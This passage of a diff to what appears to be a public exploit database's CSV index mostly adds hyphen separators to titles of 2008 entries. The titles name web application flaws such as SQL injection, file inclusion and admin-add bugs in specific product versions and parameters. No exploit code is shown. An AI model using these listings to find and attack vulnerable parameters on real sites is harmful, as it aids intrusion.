Injection",2008-05-05,K-159,php,webapps,0 -5544,platforms/php/webapps/5544.txt,"Kmita Tellfriend <= 2.0 (file) Remote File Inclusion",2008-05-05,K-159,php,webapps,0 -5545,platforms/php/webapps/5545.txt,"Kmita Mail <= 3.0 (file) Remote File Inclusion",2008-05-05,K-159,php,webapps,0 +5544,platforms/php/webapps/5544.txt,"Kmita Tellfriend <= 2.0 - (file) Remote File Inclusion",2008-05-05,K-159,php,webapps,0 +5545,platforms/php/webapps/5545.txt,"Kmita Mail <= 3.0 - (file) Remote File Inclusion",2008-05-05,K-159,php,webapps,0 5546,platforms/php/webapps/5546.txt,"BackLinkSpider (cat_id) - Remote SQL Injection",2008-05-05,K-159,php,webapps,0 5547,platforms/windows/dos/5547.txt,"Novell eDirectory < 8.7.3 SP 10 / 8.8.2 - HTTP headers DoS",2008-05-05,Nicob,windows,dos,0 -5548,platforms/php/webapps/5548.txt,"Miniweb 2.0 (historymonth) Remote SQL Injection",2008-05-05,HaCkeR_EgY,php,webapps,0 +5548,platforms/php/webapps/5548.txt,"Miniweb 2.0 - (historymonth) Remote SQL Injection",2008-05-05,HaCkeR_EgY,php,webapps,0 5549,platforms/php/webapps/5549.txt,"Power Editor 2.0 - Remote File Disclosure / Edit",2008-05-05,"Virangar Security",php,webapps,0 5550,platforms/php/webapps/5550.php,"deluxebb <= 1.2 - Multiple Vulnerabilities",2008-05-05,EgiX,php,webapps,0 -5551,platforms/php/webapps/5551.txt,"Pre Shopping Mall 1.1 (search.php search) SQL Injection",2008-05-06,t0pP8uZz,php,webapps,0 -5552,platforms/php/webapps/5552.txt,"PHPEasyData 1.5.4 (cat_id) Remote SQL Injection",2008-05-06,InjEctOr5,php,webapps,0 +5551,platforms/php/webapps/5551.txt,"Pre Shopping Mall 1.1 - (search.php search) SQL Injection",2008-05-06,t0pP8uZz,php,webapps,0 +5552,platforms/php/webapps/5552.txt,"PHPEasyData 1.5.4 - (cat_id) Remote SQL Injection",2008-05-06,InjEctOr5,php,webapps,0 5553,platforms/asp/webapps/5553.txt,"fipsCMS (print.asp lg) Remote SQL Injection",2008-05-07,InjEctOr5,asp,webapps,0 -5554,platforms/php/webapps/5554.php,"Galleristic 1.0 (index.php cat) Remote SQL Injection Exploit",2008-05-07,cOndemned,php,webapps,0 -5555,platforms/php/webapps/5555.txt,"gameCMS Lite 1.0 (index.php systemId) SQL Injection",2008-05-07,InjEctOr5,php,webapps,0 +5554,platforms/php/webapps/5554.php,"Galleristic 1.0 - (index.php cat) Remote SQL Injection Exploit",2008-05-07,cOndemned,php,webapps,0 +5555,platforms/php/webapps/5555.txt,"gameCMS Lite 1.0 - (index.php systemId) SQL Injection",2008-05-07,InjEctOr5,php,webapps,0 5556,platforms/asp/webapps/5556.txt,"PostcardMentor (step1.asp cat_fldAuto) SQL Injection",2008-05-07,InjEctOr5,asp,webapps,0 5557,platforms/php/webapps/5557.pl,"OneCMS 2.5 - Remote Blind SQL Injection Exploit",2008-05-07,Cod3rZ,php,webapps,0 5558,platforms/php/webapps/5558.txt,"CMS Faethon 2.2 Ultimate - (RFI/XSS) Multiple Remote Vulnerabilies",2008-05-07,RoMaNcYxHaCkEr,php,webapps,0 5559,platforms/php/webapps/5559.txt,"ezContents CMS 2.0.0 - Multiple Remote SQL Injection Vulnerabilities",2008-05-07,"Virangar Security",php,webapps,0 -5560,platforms/php/webapps/5560.txt,"Musicbox <= 2.3.7 (artistId) Remote SQL Injection",2008-05-07,HaCkeR_EgY,php,webapps,0 +5560,platforms/php/webapps/5560.txt,"Musicbox <= 2.3.7 - (artistId) Remote SQL Injection",2008-05-07,HaCkeR_EgY,php,webapps,0 5561,platforms/linux/dos/5561.pl,"rdesktop 1.5.0 iso_recv_msg() Integer Underflow PoC",2008-05-08,"Guido Landi",linux,dos,0 -5562,platforms/php/webapps/5562.py,"RunCMS <= 1.6.1 (msg_image) SQL Injection Exploit",2008-05-08,The:Paradox,php,webapps,0 +5562,platforms/php/webapps/5562.py,"RunCMS <= 1.6.1 - (msg_image) SQL Injection Exploit",2008-05-08,The:Paradox,php,webapps,0 5563,platforms/windows/remote/5563.pl,"TFTP Server for Windows 1.4 - ST Remote BSS Overflow Exploit",2008-05-08,tixxDZ,windows,remote,69 5564,platforms/asp/webapps/5564.txt,"Shader TV (Beta) Multiple Remote SQL Injection Vulnerabilities",2008-05-08,U238,asp,webapps,0 -5565,platforms/php/webapps/5565.pl,"vShare Youtube Clone 2.6 (tid) Remote SQL Injection",2008-05-08,Saime,php,webapps,0 +5565,platforms/php/webapps/5565.pl,"vShare Youtube Clone 2.6 - (tid) Remote SQL Injection",2008-05-08,Saime,php,webapps,0 5566,platforms/php/webapps/5566.txt,"SazCart 1.5.1 - Multiple Remote File Inclusion Vulnerabilities",2008-05-08,RoMaNcYxHaCkEr,php,webapps,0 -5567,platforms/php/webapps/5567.txt,"Cyberfolio 7.12 (rep) Remote File Inclusion",2008-05-08,RoMaNcYxHaCkEr,php,webapps,0 -5568,platforms/php/webapps/5568.txt,"miniBloggie 1.0 (del.php) Arbitrary Delete Post",2008-05-08,Cod3rZ,php,webapps,0 -5575,platforms/php/webapps/5575.txt,"Admidio 1.4.8 (getfile.php) Remote File Disclosure",2008-05-09,n3v3rh00d,php,webapps,0 -5576,platforms/php/webapps/5576.pl,"SazCart <= 1.5.1 (prodid) Remote SQL Injection Exploit",2008-05-09,JosS,php,webapps,0 +5567,platforms/php/webapps/5567.txt,"Cyberfolio 7.12 - (rep) Remote File Inclusion",2008-05-08,RoMaNcYxHaCkEr,php,webapps,0 +5568,platforms/php/webapps/5568.txt,"miniBloggie 1.0 - (del.php) Arbitrary Delete Post",2008-05-08,Cod3rZ,php,webapps,0 +5575,platforms/php/webapps/5575.txt,"Admidio 1.4.8 - (getfile.php) Remote File Disclosure",2008-05-09,n3v3rh00d,php,webapps,0 +5576,platforms/php/webapps/5576.pl,"SazCart <= 1.5.1 - (prodid) Remote SQL Injection Exploit",2008-05-09,JosS,php,webapps,0 5577,platforms/php/webapps/5577.txt,"HispaH Model Search (cat.php cat) Remote SQL Injection",2008-05-09,InjEctOr5,php,webapps,0 5578,platforms/php/webapps/5578.txt,"Phoenix View CMS <= Pre Alpha2 - (SQL/LFI/XSS) Multiple Vulnerabilities",2008-05-09,tw8,php,webapps,0 -5579,platforms/php/webapps/5579.htm,"txtCMS 0.3 (index.php) Local File Inclusion Exploit",2008-05-09,cOndemned,php,webapps,0 +5579,platforms/php/webapps/5579.htm,"txtCMS 0.3 - (index.php) Local File Inclusion Exploit",2008-05-09,cOndemned,php,webapps,0 5580,platforms/php/webapps/5580.txt,"Ktools PhotoStore <= 3.5.1 - (gallery.php gid) SQL Injection",2008-05-09,Mr.SQL,php,webapps,0 5581,platforms/php/webapps/5581.txt,"Advanced Links Management (ALM) 1.52 SQL Injection",2008-05-10,His0k4,php,webapps,0 5582,platforms/php/webapps/5582.txt,"Ktools PhotoStore <= 3.5.2 - Multiple SQL Injection Vulnerabilities",2008-05-10,DNX,php,webapps,0 @@ -5216,30 +5216,30 @@ id,file,description,date,author,platform,type,port 5587,platforms/php/webapps/5587.pl,"Joomla Component xsstream-dm 0.01b Remote SQL Injection Exploit",2008-05-11,Houssamix,php,webapps,0 5588,platforms/php/webapps/5588.php,"QuickUpCMS - Multiple Remote SQL Injection Vulnerabilities Exploit",2008-05-11,Lidloses_Auge,php,webapps,0 5589,platforms/php/webapps/5589.php,"Vortex CMS (index.php pageid) Blind SQL Injection Exploit",2008-05-11,Lidloses_Auge,php,webapps,0 -5590,platforms/php/webapps/5590.txt,"AJ Article 1.0 (featured_article.php) Remote SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 +5590,platforms/php/webapps/5590.txt,"AJ Article 1.0 - (featured_article.php) Remote SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 5591,platforms/php/webapps/5591.txt,"AJ Auction <= 6.2.1 - (classifide_ad.php) SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 -5592,platforms/php/webapps/5592.txt,"AJ Classifieds 2008 (index.php) Remote SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 -5594,platforms/php/webapps/5594.txt,"ZeusCart <= 2.0 (category_list.php) SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 +5592,platforms/php/webapps/5592.txt,"AJ Classifieds 2008 - (index.php) Remote SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 +5594,platforms/php/webapps/5594.txt,"ZeusCart <= 2.0 - (category_list.php) SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 5595,platforms/php/webapps/5595.txt,"clanlite 2.x - (SQL Injection/XSS) Multiple Vulnerabilities",2008-05-12,ZoRLu,php,webapps,0 5596,platforms/php/webapps/5596.txt,"BIGACE 2.4 - Multiple Remote File Inclusion Vulnerabilities",2008-05-12,BiNgZa,php,webapps,0 5597,platforms/php/webapps/5597.pl,"Battle.net Clan Script <= 1.5.x - Remote SQL Injection Exploit",2008-05-12,Stack,php,webapps,0 -5598,platforms/php/webapps/5598.txt,"Mega File Hosting Script 1.2 (fid) Remote SQL Injection",2008-05-12,TurkishWarriorr,php,webapps,0 +5598,platforms/php/webapps/5598.txt,"Mega File Hosting Script 1.2 - (fid) Remote SQL Injection",2008-05-12,TurkishWarriorr,php,webapps,0 5599,platforms/php/webapps/5599.txt,"PHP Classifieds Script <= 05122008 SQL Injection Vulnerabilities",2008-05-12,InjEctOr5,php,webapps,0 5600,platforms/php/webapps/5600.php,"CMS Made Simple <= 1.2.4 - (FileManager module) File Upload Exploit",2008-05-12,EgiX,php,webapps,0 5601,platforms/php/webapps/5601.pl,"Advanced Image Hosting (AIH) 2.1 - Remote SQL Injection Exploit",2008-05-12,Stack,php,webapps,0 5602,platforms/php/webapps/5602.txt,"AJ HYIP ACME (topic_detail.php id) Remote SQL Injection",2008-05-12,InjEctOr5,php,webapps,0 5603,platforms/php/webapps/5603.txt,"EQDKP 1.3.2f (user_id) Authentication Bypass (PoC)",2008-05-13,vortfu,php,webapps,0 -5604,platforms/php/webapps/5604.txt,"e107 Plugin BLOG Engine 2.2 (rid) Blind SQL Injection",2008-05-13,Saime,php,webapps,0 +5604,platforms/php/webapps/5604.txt,"e107 Plugin BLOG Engine 2.2 - (rid) Blind SQL Injection",2008-05-13,Saime,php,webapps,0 5605,platforms/php/webapps/5605.txt,"e-107 Plugin zogo-shop 1.16 Beta 13 SQL Injection",2008-05-13,Cr@zy_King,php,webapps,0 5606,platforms/php/webapps/5606.txt,"Web Group Communication Center (WGCC) <= 1.0.3 - SQL Injection",2008-05-13,myvx,php,webapps,0 -5607,platforms/php/webapps/5607.txt,"CaLogic Calendars 1.2.2 (langsel) Remote SQL Injection",2008-05-13,His0k4,php,webapps,0 +5607,platforms/php/webapps/5607.txt,"CaLogic Calendars 1.2.2 - (langsel) Remote SQL Injection",2008-05-13,His0k4,php,webapps,0 5608,platforms/asp/webapps/5608.txt,"Meto Forum 1.1 - Multiple Remote SQL Injection Vulnerabilities",2008-05-13,U238,asp,webapps,0 5609,platforms/php/webapps/5609.txt,"EMO Realty Manager (news.php ida) SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0 5610,platforms/php/webapps/5610.txt,"The Real Estate Script (dpage.php docID) SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0 5611,platforms/php/webapps/5611.txt,"Linkspile (link.php cat_id) Remote SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0 5612,platforms/windows/remote/5612.html,"idautomation bar code ActiveX - Multiple Vulnerabilities",2008-05-14,shinnai,windows,remote,0 5613,platforms/php/webapps/5613.txt,"Freelance Auction Script 1.0 - (browseproject.php) SQL Injection",2008-05-14,t0pP8uZz,php,webapps,0 -5614,platforms/php/webapps/5614.txt,"Feedback and Rating Script 1.0 (detail.php) SQL Injection",2008-05-14,t0pP8uZz,php,webapps,0 +5614,platforms/php/webapps/5614.txt,"Feedback and Rating Script 1.0 - (detail.php) SQL Injection",2008-05-14,t0pP8uZz,php,webapps,0 5615,platforms/php/webapps/5615.txt,"AS-GasTracker 1.0.0 Insecure Cookie Handling",2008-05-14,t0pP8uZz,php,webapps,0 5616,platforms/php/webapps/5616.txt,"ActiveKB <= 1.5 Insecure Cookie Handling/Arbitrary Admin Access",2008-05-14,t0pP8uZz,php,webapps,0 5617,platforms/php/webapps/5617.txt,"Internet Photoshow (Special Edition) - Insecure Cookie Handling",2008-05-14,t0pP8uZz,php,webapps,0 @@ -5251,7 +5251,7 @@ id,file,description,date,author,platform,type,port 5623,platforms/php/webapps/5623.txt,"Kostenloses Linkmanagementscript SQL Injection Vulnerabilities",2008-05-15,"Virangar Security",php,webapps,0 5624,platforms/php/webapps/5624.txt,"newsmanager 2.0 - (RFI/rfd/SQL/pb) Multiple Vulnerabilities",2008-05-15,GoLd_M,php,webapps,0 5625,platforms/windows/local/5625.c,"Symantec Altiris Client Service 6.8.378 - Local Privilege Escalation Exploit",2008-05-15,"Alex Hernandez",windows,local,0 -5626,platforms/php/webapps/5626.txt,"68 Classifieds 4.0 (category.php cat) SQL Injection",2008-05-15,HaCkeR_EgY,php,webapps,0 +5626,platforms/php/webapps/5626.txt,"68 Classifieds 4.0 - (category.php cat) SQL Injection",2008-05-15,HaCkeR_EgY,php,webapps,0 5627,platforms/php/webapps/5627.pl,"Pet Grooming Management System <= 2.0 - Arbitrary Add-Admin Exploit",2008-05-15,t0pP8uZz,php,webapps,0 5628,platforms/php/webapps/5628.txt,"RantX 1.0 Insecure Admin Authentication",2008-05-15,t0pP8uZz,php,webapps,0 5629,platforms/php/webapps/5629.txt,"Web Slider <= 0.6 - Insecure Cookie/Authentication Handling",2008-05-15,t0pP8uZz,php,webapps,0 @@ -5259,53 +5259,53 @@ id,file,description,date,author,platform,type,port 5631,platforms/php/webapps/5631.txt,"IMGallery 2.5 Multiply Remote SQL Injection Vulnerabilities",2008-05-15,cOndemned,php,webapps,0 5632,platforms/linux/remote/5632.rb,"Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Bruteforce SSH Exploit (Ruby)",2008-05-16,L4teral,linux,remote,22 5633,platforms/asp/webapps/5633.pl,"StanWeb.CMS (default.asp id) Remote SQL Injection Exploit",2008-05-16,JosS,asp,webapps,0 -5634,platforms/php/webapps/5634.htm,"Zomplog <= 3.8.2 (newuser.php) Arbitrary Add Admin Exploit",2008-05-16,ArxWolf,php,webapps,0 -5635,platforms/php/webapps/5635.pl,"Archangel Weblog 0.90.02 (post_id) SQL Injection Exploit",2008-05-16,Stack,php,webapps,0 +5634,platforms/php/webapps/5634.htm,"Zomplog <= 3.8.2 - (newuser.php) Arbitrary Add Admin Exploit",2008-05-16,ArxWolf,php,webapps,0 +5635,platforms/php/webapps/5635.pl,"Archangel Weblog 0.90.02 - (post_id) SQL Injection Exploit",2008-05-16,Stack,php,webapps,0 5636,platforms/php/webapps/5636.txt,"Zomplog <= 3.8.2 - (force_download.php) File Disclosure",2008-05-16,Stack,php,webapps,0 -5637,platforms/php/webapps/5637.txt,"WR-Meeting 1.0 (msnum) Local File Disclosure",2008-05-17,Cr@zy_King,php,webapps,0 +5637,platforms/php/webapps/5637.txt,"WR-Meeting 1.0 - (msnum) Local File Disclosure",2008-05-17,Cr@zy_King,php,webapps,0 5638,platforms/php/webapps/5638.txt,"How2ASP.net Webboard <= 4.1 - Remote SQL Injection",2008-05-17,"CWH Underground",php,webapps,0 -5639,platforms/php/webapps/5639.pl,"FicHive 1.0 (category) Remote Blind SQL Injection Exploit",2008-05-17,His0k4,php,webapps,0 -5640,platforms/php/webapps/5640.py,"Smeego 1.0 (Cookie lang) Local File Inclusion Exploit",2008-05-17,0in,php,webapps,0 +5639,platforms/php/webapps/5639.pl,"FicHive 1.0 - (category) Remote Blind SQL Injection Exploit",2008-05-17,His0k4,php,webapps,0 +5640,platforms/php/webapps/5640.py,"Smeego 1.0 - (Cookie lang) Local File Inclusion Exploit",2008-05-17,0in,php,webapps,0 5641,platforms/php/webapps/5641.txt,"CMS WebManager-Pro Multiple Remote SQL Injection Vulnerabilities",2008-05-18,dun,php,webapps,0 5642,platforms/php/webapps/5642.txt,"TAGWORX.CMS - Multiple Remote SQL Injection Vulnerabilities",2008-05-18,dun,php,webapps,0 5643,platforms/php/webapps/5643.txt,"Ajax framework (lang) Local File Inclusion",2008-05-18,dun,php,webapps,0 5644,platforms/php/webapps/5644.txt,"lulieblog 1.2 - Multiple Vulnerabilities",2008-05-18,Cod3rZ,php,webapps,0 5645,platforms/php/webapps/5645.txt,"AlkalinePHP <= 0.77.35 - (adduser.php) Arbitrary Add-Admin",2008-05-18,t0pP8uZz,php,webapps,0 5646,platforms/php/webapps/5646.txt,"easycms <= 0.4.2 - Multiple Vulnerabilities",2008-05-18,t0pP8uZz,php,webapps,0 -5647,platforms/php/webapps/5647.txt,"GNU/Gallery <= 1.1.1.0 (admin.php) Local File Inclusion",2008-05-18,t0pP8uZz,php,webapps,0 +5647,platforms/php/webapps/5647.txt,"GNU/Gallery <= 1.1.1.0 - (admin.php) Local File Inclusion",2008-05-18,t0pP8uZz,php,webapps,0 5648,platforms/php/webapps/5648.pl,"MeltingIce File System <= 1.0 - Remote Arbitrary Add-User Exploit",2008-05-18,t0pP8uZz,php,webapps,0 5649,platforms/php/webapps/5649.pl,"PHP AGTC-Membership System <= 1.1a Arbitrary Add-Admin Exploit",2008-05-18,t0pP8uZz,php,webapps,0 5650,platforms/php/webapps/5650.pl,"MyPicGallery 1.0 - Arbitrary Add-Admin Exploit",2008-05-18,t0pP8uZz,php,webapps,0 5651,platforms/php/webapps/5651.txt,"microssys CMS <= 1.5 - Remote File Inclusion",2008-05-19,Raz0r,php,webapps,0 5652,platforms/php/webapps/5652.pl,"AlkalinePHP <= 0.80.00 beta (thread.php id) SQL Injection Exploit",2008-05-19,Stack,php,webapps,0 -5653,platforms/php/webapps/5653.php,"MercuryBoard <= 1.1.5 (login.php) Remote Blind SQL Injection Exploit",2008-05-19,EgiX,php,webapps,0 +5653,platforms/php/webapps/5653.php,"MercuryBoard <= 1.1.5 - (login.php) Remote Blind SQL Injection Exploit",2008-05-19,EgiX,php,webapps,0 5654,platforms/php/webapps/5654.txt,"EntertainmentScript (play.php id) Remote SQL Injection",2008-05-19,Mr.SQL,php,webapps,0 -5655,platforms/php/webapps/5655.pl,"EntertainmentScript 1.4.0 (page.php page) Local File Inclusion Exploit",2008-05-20,Stack,php,webapps,0 +5655,platforms/php/webapps/5655.pl,"EntertainmentScript 1.4.0 - (page.php page) Local File Inclusion Exploit",2008-05-20,Stack,php,webapps,0 5656,platforms/php/webapps/5656.txt,"ecms 0.4.2 - (SQL/pb) Multiple Vulnerabilities",2008-05-20,"Virangar Security",php,webapps,0 5657,platforms/php/webapps/5657.txt,"Mantis Bug Tracker 1.1.1 - (CE/XSS/CSRF) Multiple Vulnerabilities",2008-05-20,USH,php,webapps,0 -5658,platforms/php/webapps/5658.txt,"ComicShout 2.5 (index.php comic_id) Remote SQL Injection",2008-05-20,Niiub,php,webapps,0 -5659,platforms/php/webapps/5659.txt,"MX-System 2.7.3 (index.php page) Remote SQL Injection",2008-05-20,cOndemned,php,webapps,0 -5660,platforms/php/webapps/5660.txt,"Php Jokesite 2.0 (cat_id) Remote SQL Injection",2008-05-20,InjEctOr5,php,webapps,0 -5661,platforms/php/webapps/5661.txt,"Netious CMS 0.4 (index.php pageid) SQL Injection",2008-05-21,InjEctOr5,php,webapps,0 +5658,platforms/php/webapps/5658.txt,"ComicShout 2.5 - (index.php comic_id) Remote SQL Injection",2008-05-20,Niiub,php,webapps,0 +5659,platforms/php/webapps/5659.txt,"MX-System 2.7.3 - (index.php page) Remote SQL Injection",2008-05-20,cOndemned,php,webapps,0 +5660,platforms/php/webapps/5660.txt,"Php Jokesite 2.0 - (cat_id) Remote SQL Injection",2008-05-20,InjEctOr5,php,webapps,0 +5661,platforms/php/webapps/5661.txt,"Netious CMS 0.4 - (index.php pageid) SQL Injection",2008-05-21,InjEctOr5,php,webapps,0 5662,platforms/cgi/webapps/5662.txt,"Alcatel OmniPCX Office 210/061.1 - Remote Command Execution",2008-05-21,DSecRG,cgi,webapps,0 5663,platforms/php/webapps/5663.txt,"6rbScript - (news.php newsid) Remote SQL Injection",2008-05-21,"Hussin X",php,webapps,0 5664,platforms/php/webapps/5664.txt,"webl?sninger <= 4 - (XSS/SQL) Multiple Vulnerabilities",2008-05-21,Mr.SQL,php,webapps,0 5665,platforms/php/webapps/5665.txt,"Netbutikker <= 4 - Remote SQL Injection Vulnerabilities",2008-05-21,Mr.SQL,php,webapps,0 -5666,platforms/php/webapps/5666.txt,"e107 Plugin BLOG Engine 2.2 (uid) Blind SQL Injection",2008-05-22,"Virangar Security",php,webapps,0 +5666,platforms/php/webapps/5666.txt,"e107 Plugin BLOG Engine 2.2 - (uid) Blind SQL Injection",2008-05-22,"Virangar Security",php,webapps,0 5667,platforms/windows/local/5667.py,"VLC 0.8.6d SSA Parsing Double Sh311 - Universal Exploit",2008-05-23,j0rgan,windows,local,0 5668,platforms/php/webapps/5668.txt,"quate CMS 0.3.4 - (RFI/LFI/XSS/dt) Multiple Vulnerabilities",2008-05-23,DSecRG,php,webapps,0 -5669,platforms/php/webapps/5669.txt,"OneCMS 2.5 (install_mod.php) Local File Inclusion",2008-05-23,DSecRG,php,webapps,0 -5670,platforms/php/webapps/5670.txt,"RoomPHPlanning 1.5 (idresa) Remote SQL Injection",2008-05-24,His0k4,php,webapps,0 +5669,platforms/php/webapps/5669.txt,"OneCMS 2.5 - (install_mod.php) Local File Inclusion",2008-05-23,DSecRG,php,webapps,0 +5670,platforms/php/webapps/5670.txt,"RoomPHPlanning 1.5 - (idresa) Remote SQL Injection",2008-05-24,His0k4,php,webapps,0 5671,platforms/php/webapps/5671.txt,"phpRaider 1.0.7 - (phpbb3.functions.php) RFI",2008-05-24,Kacak,php,webapps,0 5672,platforms/php/webapps/5672.txt,"plusphp url shortening software 1.6 - Remote File Inclusion",2008-05-25,DR.TOXIC,php,webapps,0 5673,platforms/php/webapps/5673.txt,"Xomol CMS <= 1.2 Login Bypass / LFI Vulnerabilities",2008-05-25,DNX,php,webapps,0 5674,platforms/php/webapps/5674.txt,"RoomPHPlanning 1.5 - Arbitrary Add Admin User",2008-05-26,Stack,php,webapps,0 5675,platforms/php/webapps/5675.txt,"RoomPHPlanning 1.5 - Multiple Remote SQL Injection Vulnerabilities",2008-05-26,"Virangar Security",php,webapps,0 -5676,platforms/php/webapps/5676.txt,"CMS MAXSITE <= 1.10 (category) Remote SQL Injection",2008-05-26,Tesz,php,webapps,0 -5677,platforms/php/webapps/5677.txt,"RevokeBB 1.0 RC11 (search) Remote SQL Injection",2008-05-27,The:Paradox,php,webapps,0 -5678,platforms/php/webapps/5678.txt,"CKGold Shopping Cart 2.5 (category_id) SQL Injection",2008-05-27,Cr@zy_King,php,webapps,0 +5676,platforms/php/webapps/5676.txt,"CMS MAXSITE <= 1.10 - (category) Remote SQL Injection",2008-05-26,Tesz,php,webapps,0 +5677,platforms/php/webapps/5677.txt,"RevokeBB 1.0 RC11 - (search) Remote SQL Injection",2008-05-27,The:Paradox,php,webapps,0 +5678,platforms/php/webapps/5678.txt,"CKGold Shopping Cart 2.5 - (category_id) SQL Injection",2008-05-27,Cr@zy_King,php,webapps,0 5679,platforms/multiple/dos/5679.php,"PHP 5.2.6 - sleep() Local Memory Exhaust Exploit",2008-05-27,Gogulas,multiple,dos,0 -5680,platforms/php/webapps/5680.txt,"OtomiGen.X 2.2 (lang) Local File Inclusion Vulnerabilities",2008-05-27,Saime,php,webapps,0 +5680,platforms/php/webapps/5680.txt,"OtomiGen.X 2.2 - (lang) Local File Inclusion Vulnerabilities",2008-05-27,Saime,php,webapps,0 5681,platforms/windows/remote/5681.html,"Creative Software AutoUpdate Engine - ActiveX Stack Overflow Exploit",2008-05-27,BitKrush,windows,remote,0 5682,platforms/windows/dos/5682.html,"CA Internet Security Suite 2008 SaveToFile()File Corruption PoC",2008-05-28,Nine:Situations:Group,windows,dos,0 5683,platforms/php/webapps/5683.txt,"PHPhotoalbum 0.5 - Multiple Remote SQL Injection Vulnerabilities",2008-05-28,cOndemned,php,webapps,0 @@ -5313,36 +5313,36 @@ id,file,description,date,author,platform,type,port 5685,platforms/php/webapps/5685.txt,"FlashBlog (articulo_id) Remote SQL Injection",2008-05-28,HER0,php,webapps,0 5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader <= 8.1.2 - Malformed PDF Remote DoS PoC",2008-05-29,securfrog,windows,dos,0 5688,platforms/php/webapps/5688.php,"SyntaxCMS <= 1.3 - (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0 -5689,platforms/php/webapps/5689.txt,"AirvaeCommerce 3.0 (pid) Remote SQL Injection",2008-05-29,QTRinux,php,webapps,0 +5689,platforms/php/webapps/5689.txt,"AirvaeCommerce 3.0 - (pid) Remote SQL Injection",2008-05-29,QTRinux,php,webapps,0 5690,platforms/php/webapps/5690.txt,"PicoFlat CMS 0.5.9 - Local File Inclusion Vulnerabilitty (Windows)",2008-05-29,gmda,php,webapps,0 5691,platforms/php/webapps/5691.php,"CMS from Scratch <= 1.1.3 - (fckeditor) Remote Shell Upload Exploit",2008-05-29,EgiX,php,webapps,0 5692,platforms/php/webapps/5692.pl,"Mambo Component mambads <= 1.0 RC1 Beta SQL Injection",2008-05-29,Houssamix,php,webapps,0 -5693,platforms/php/webapps/5693.txt,"CMS from Scratch <= 1.1.3 (image.php) Directory Traversal",2008-05-29,Stack,php,webapps,0 +5693,platforms/php/webapps/5693.txt,"CMS from Scratch <= 1.1.3 - (image.php) Directory Traversal",2008-05-29,Stack,php,webapps,0 5694,platforms/windows/remote/5694.cpp,"ASUS DPC Proxy 2.0.0.16/19 - Remote Buffer Overflow Exploit",2008-05-29,Heretic2,windows,remote,623 5695,platforms/windows/remote/5695.cpp,"Now SMS/Mms Gateway 5.5 - Remote Buffer Overflow Exploit",2008-05-29,Heretic2,windows,remote,8800 5696,platforms/php/webapps/5696.pl,"PHP Booking Calendar 10 d - Remote SQL Injection Exploit",2008-05-29,Stack,php,webapps,0 5697,platforms/php/webapps/5697.php,"PHP Booking Calendar 10 d - (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0 -5698,platforms/php/webapps/5698.txt,"HiveMaker Professional <= 1.0.2 (cid) SQL Injection",2008-05-30,K-159,php,webapps,0 +5698,platforms/php/webapps/5698.txt,"HiveMaker Professional <= 1.0.2 - (cid) SQL Injection",2008-05-30,K-159,php,webapps,0 5699,platforms/php/webapps/5699.txt,"PsychoStats <= 2.3.3 - Multiple Remote SQL Injection Vulnerabilities",2008-05-31,Mr.SQL,php,webapps,0 5700,platforms/php/webapps/5700.htm,"CMSimple 3.1 - Local File Inclusion / Arbitrary File Upload Exploit",2008-05-31,irk4z,php,webapps,0 5701,platforms/php/webapps/5701.txt,"Social Site Generator (sgc_id) Remote SQL Injection",2008-05-31,"DeAr Ev!L",php,webapps,0 5702,platforms/php/webapps/5702.txt,"Azuresites CMS - Multiple Vulnerabilities",2008-05-31,Lidloses_Auge,php,webapps,0 -5703,platforms/php/webapps/5703.txt,"PHP Visit Counter <= 0.4 (datespan) SQL Injection",2008-05-31,Lidloses_Auge,php,webapps,0 -5704,platforms/php/webapps/5704.txt,"PassWiki <= 0.9.16 RC3 (site_id) Local File Inclusion",2008-05-31,mozi,php,webapps,0 -5705,platforms/asp/webapps/5705.txt,"BP Blog 6.0 (id) Remote Blind SQL Injection",2008-05-31,JosS,asp,webapps,0 +5703,platforms/php/webapps/5703.txt,"PHP Visit Counter <= 0.4 - (datespan) SQL Injection",2008-05-31,Lidloses_Auge,php,webapps,0 +5704,platforms/php/webapps/5704.txt,"PassWiki <= 0.9.16 RC3 - (site_id) Local File Inclusion",2008-05-31,mozi,php,webapps,0 +5705,platforms/asp/webapps/5705.txt,"BP Blog 6.0 - (id) Remote Blind SQL Injection",2008-05-31,JosS,asp,webapps,0 5706,platforms/php/webapps/5706.php,"EasyWay CMS (index.php mid) Remote SQL Injection Exploit",2008-05-31,Lidloses_Auge,php,webapps,0 5707,platforms/php/webapps/5707.txt,"Social Site Generator (path) Remote File Inclusion",2008-05-31,vBmad,php,webapps,0 -5708,platforms/php/webapps/5708.txt,"Joomla Component prayercenter <= 1.4.9 (id) SQL Injection",2008-05-31,His0k4,php,webapps,0 +5708,platforms/php/webapps/5708.txt,"Joomla Component prayercenter <= 1.4.9 - (id) SQL Injection",2008-05-31,His0k4,php,webapps,0 5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Remote Stack Overflow PoC (Auth)",2008-05-31,securfrog,windows,dos,0 -5710,platforms/php/webapps/5710.pl,"Joomla Component com_biblestudy 1.5.0 (id) SQL Injection Exploit",2008-05-31,Stack,php,webapps,0 +5710,platforms/php/webapps/5710.pl,"Joomla Component com_biblestudy 1.5.0 - (id) SQL Injection Exploit",2008-05-31,Stack,php,webapps,0 5711,platforms/php/webapps/5711.txt,"Social Site Generator 2.0 - Multiple Remote File Disclosure Vulnerabilities",2008-06-01,Stack,php,webapps,0 5712,platforms/multiple/dos/5712.pl,"Samba (client) receive_smb_raw() Buffer Overflow PoC",2008-06-01,"Guido Landi",multiple,dos,0 -5713,platforms/php/webapps/5713.txt,"ComicShout 2.8 (news.php news_id) SQL Injection",2008-06-01,JosS,php,webapps,0 +5713,platforms/php/webapps/5713.txt,"ComicShout 2.8 - (news.php news_id) SQL Injection",2008-06-01,JosS,php,webapps,0 5714,platforms/php/webapps/5714.pl,"Joomla Component com_mycontent 1.1.13 - Blind SQL Injection 